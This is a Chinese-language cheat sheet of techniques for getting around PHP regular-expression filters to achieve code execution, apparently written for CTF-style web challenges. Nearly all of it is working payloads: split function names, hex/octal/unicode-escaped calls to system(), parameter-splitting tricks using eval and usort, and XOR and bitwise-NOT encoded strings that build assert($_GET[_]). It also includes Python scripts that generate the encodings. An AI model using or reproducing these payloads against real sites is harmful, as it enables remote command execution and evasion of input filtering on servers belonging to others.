绕过PHP正则表达式

1.字符串拼接绕过【PHP>=7】

适合绕过具体关键字

payload：

(sy.(st).em)(who.ami);

 

2.字符串转义绕过【PHP>=7】

字符串转十六进制、八进制、unicode脚本

# -*- coding:utf-8 -*-

def hex_payload(payload):
	res_payload = ''
	for i in payload:
		i = "\\x" + hex(ord(i))[2:]
		res_payload += i
	print("[+]'{}' Convert to hex: \"{}\"".format(payload,res_payload))

def oct_payload(payload):
	res_payload = ""
	for i in payload:
		i = "\\" + oct(ord(i))[2:]
		res_payload += i
	print("[+]'{}' Convert to oct: \"{}\"".format(payload,res_payload))

def uni_payload(payload):
	res_payload = ""
	for i in payload:
		i = "\\u{{{0}}}".format(hex(ord(i))[2:])
		res_payload += i
	print("[+]'{}' Convert to unicode: \"{}\"".format(payload,res_payload))

if __name__ == '__main__':
	payload = 'phpinfo'
	hex_payload(payload)
	oct_payload(payload)
	uni_payload(payload)

payload：

"\x70\x68\x70\x69\x6e\x66\x6f"();#phpinfo();
"\163\171\163\164\145\155"('whoami');#system('whoami');
"\u{73}\u{79}\u{73}\u{74}\u{65}\u{6d}"('id');#system('whoami');
"\163\171\163\164\145\155"("\167\150\157\141\155\151");#system('whoami');
.......

 

3.多次传参绕过【版本无限制】

payload：

GET:
?1=system&2=whoami
POST:
cmd=$_GET[1]($_GET[2]);

cmd=$_POST[1]($_POST[2]);&1=system&2=whoami

?1=system("ls");
POST:cmd=eval($_GET[1]);

如果长度受限，可以尝试使用可回调函数：

?1[]=1&1[]=phpinfo()&2=assert
POST:cmd=usort(...$_GET);

 

4.异或绕过【版本无限制】

在PHP中两个字符串异或之后，得到的还是一个字符串。例如：我们异或 ? 和 ~ 之后得到的是 A

字符：?         ASCII码：63           二进制：  0011 1111
字符：~         ASCII码：126          二进制：  0111 1110
异或规则：
1   XOR   0   =   1
0   XOR   1   =   1
0   XOR   0   =   0
1   XOR   1   =   0
上述两个字符异或得到 二进制：  0100 0001
该二进制的十进制也就是：65
对应的ASCII码是：A

取ASCII表种非字母数字的其他字符，要注意有些字符可能会影响整个语句执行，所以要去掉如：反引号，单引号

异或脚本：

# -*- coding: utf-8 -*-

payload = "assert"
strlist = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 35, 36, 37, 38, 40, 41, 42, 43, 44, 45, 46, 47, 58, 59, 60, 61, 62, 63, 64, 91, 93, 94, 95, 96, 123, 124, 125, 126, 127]
#strlist是ascii表中所有非字母数字的字符十进制
str1,str2 = '',''

for char in payload:
    for i in strlist:
        for j in strlist:
            if(i ^ j == ord(char)):
                i = '%{:0>2}'.format(hex(i)[2:])
                j = '%{:0>2}'.format(hex(j)[2:])
                print("('{0}'^'{1}')".format(i,j),end=".")
                break
        else:
            continue
        break

目标：assert($_GET[_]);

$_=('%01'^'%60').('%08'^'%7b').('%08'^'%7b').('%05'^'%60').('%09'^'%7b').('%08'^'%7c');
//$_='assert';
$__='_'.('%07'^'%40').('%05'^'%40').('%09'^'%5d');
//$__='_GET';
$___=$$__;
//$___='$_GET';
$_($___[_]);
//assert($_GET[_]);

最终payload：

$_=('%01'^'%60').('%08'^'%7b').('%08'^'%7b').('%05'^'%60').('%09'^'%7b').('%08'^'%7c');$__='_'.('%07'^'%40').('%05'^'%40').('%09'^'%5d');$___=$$__;$_($___[_]);&_=phpinfo();

 

5.url编码取反绕过【版本无限制】

PHP>=7时

<?php
$a='assert';
echo urlencode(~$a);
echo"<br/>";
$b='(eval($_POST[cmd]))';
echo urlencode(~$b);
?>

 payloay：

(~%8C%86%8C%8B%9A%92)(~%88%97%90%9E%92%96);
#system('whoami');

5=<PHP<=7.0.9时

需要再执行一次构造出来的字符，所以参考上面那种异或拼接的方法

$_=(~'%9E%8C%8C%9A%8D%8B');$__='_'.(~'%AF%B0%AC%AB');$___=$$__;$_($___[_]);
#assert($_POST[_]);